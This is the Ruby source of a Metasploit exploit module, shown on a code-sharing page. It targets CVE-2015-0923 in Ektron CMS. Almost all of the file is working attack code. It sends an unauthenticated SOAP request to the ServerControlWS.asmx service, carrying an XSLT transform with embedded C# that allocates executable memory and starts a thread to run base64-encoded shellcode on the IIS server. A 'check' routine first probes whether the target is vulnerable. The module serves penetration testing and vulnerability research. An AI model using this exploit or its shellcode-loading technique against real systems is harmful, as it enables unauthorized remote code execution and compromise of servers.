Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::EXE
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',
17
'Description' => %q{
18
Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have
19
vulnerabilities in various operations within the ServerControlWS.asmx
20
web services. These vulnerabilities allow for RCE without authentication and
21
execute in the context of IIS on the remote system.
22
},
23
'Author' => [
24
'catatonicprime'
25
],
26
'License' => MSF_LICENSE,
27
'References' => [
28
[ 'CVE', '2015-0923' ],
29
[ 'US-CERT-VU', '377644' ],
30
[ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]
31
],
32
'Payload' => {
33
'Space' => 2048,
34
'StackAdjustment' => -3500
35
},
36
'Platform' => 'win',
37
'Privileged' => true,
38
'Targets' => [
39
['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]
40
],
41
'DefaultTarget' => 0,
42
'DisclosureDate' => '2015-02-05',
43
'Notes' => {
44
'Reliability' => UNKNOWN_RELIABILITY,
45
'Stability' => UNKNOWN_STABILITY,
46
'SideEffects' => UNKNOWN_SIDE_EFFECTS
47
}
48
)
49
)
50
51
register_options(
52
[
53
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
54
OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),
55
OptEnum.new('TARGETOP',
56
[
57
true,
58
'The vulnerable web service operation to exploit',
59
'ContentBlockEx',
60
[
61
'ContentBlockEx',
62
'GetBookmarkString',
63
'GetContentFlaggingString',
64
'GetContentRatingString',
65
'GetMessagingString'
66
]
67
])
68
]
69
)
70
end
71
72
def vulnerable_param
73
return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'
74
75
'xslt'
76
end
77
78
def required_params
79
return '' if datastore['TARGETOP'] == 'ContentBlockEx'
80
81
'<showmode/>'
82
end
83
84
def target_operation
85
datastore['TARGETOP']
86
end
87
88
def prologue
89
<<~XSLT
90
<?xml version="1.0" encoding="utf-8"?>
91
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
92
<soap:Body>
93
<#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">
94
#{required_params}
95
<#{vulnerable_param}>
96
<![CDATA[
97
<xsl:transform version="2.0"
98
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
99
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
100
xmlns:user="http://mycompany.com/mynamespace">
101
<msxsl:script language="C#" implements-prefix="user">
102
XSLT
103
end
104
105
def epilogue
106
<<~XSLT
107
</msxsl:script>
108
<xsl:template match="/">
109
<xsl:value-of select="user:xml()"/>
110
</xsl:template>
111
</xsl:transform>
112
]]>
113
</#{vulnerable_param}>
114
</#{target_operation}>
115
</soap:Body>
116
</soap:Envelope>
117
XSLT
118
end
119
120
def check
121
fingerprint = rand_text_alpha(5 + rand(5))
122
xslt_data = <<~XSLT
123
#{prologue}
124
public string xml() {
125
return "#{fingerprint}";
126
}
127
#{epilogue}
128
XSLT
129
130
res = send_request_cgi(
131
{
132
'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",
133
'version' => '1.1',
134
'method' => 'POST',
135
'ctype' => "text/xml; charset=UTF-8",
136
'headers' => {
137
"Referer" => build_referer
138
},
139
'data' => xslt_data
140
}
141
)
142
143
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
144
return Exploit::CheckCode::Vulnerable
145
end
146
147
return Exploit::CheckCode::Safe
148
end
149
150
def uri_path
151
uri_path = target_uri.path
152
uri_path << "/" if uri_path[-1, 1] != "/"
153
uri_path
154
end
155
156
def build_referer
157
if datastore['SSL']
158
schema = "https://"
159
else
160
schema = "http://"
161
end
162
163
referer = schema
164
referer << rhost
165
referer << ":#{rport}"
166
referer << uri_path
167
referer
168
end
169
170
def exploit
171
print_status("Generating the EXE Payload and the XSLT...")
172
fingerprint = rand_text_alpha(5 + rand(5))
173
174
xslt_data = <<~XSLT
175
#{prologue}
176
private static UInt32 MEM_COMMIT = 0x1000;
177
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
178
179
[System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
180
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
181
182
[System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
183
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
184
185
public string xml()
186
{
187
string shellcode64 = @&quot;#{Rex::Text.encode_base64(payload.encoded)}&quot;;
188
byte[] shellcode = System.Convert.FromBase64String(shellcode64);
189
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
190
System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
191
IntPtr hThread = IntPtr.Zero;
192
IntPtr pinfo = IntPtr.Zero;
193
UInt32 threadId = 0;
194
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
195
return &quot;#{fingerprint}&quot;;
196
}
197
#{epilogue}
198
XSLT
199
200
print_status("Trying to run the xslt transformation...")
201
res = send_request_cgi(
202
{
203
'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",
204
'version' => '1.1',
205
'method' => 'POST',
206
'ctype' => "text/xml; charset=UTF-8",
207
'headers' => {
208
"Referer" => build_referer
209
},
210
'data' => xslt_data
211
}
212
)
213
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
214
print_good("Exploitation was successful")
215
else
216
fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
217
end
218
end
219
end
220
221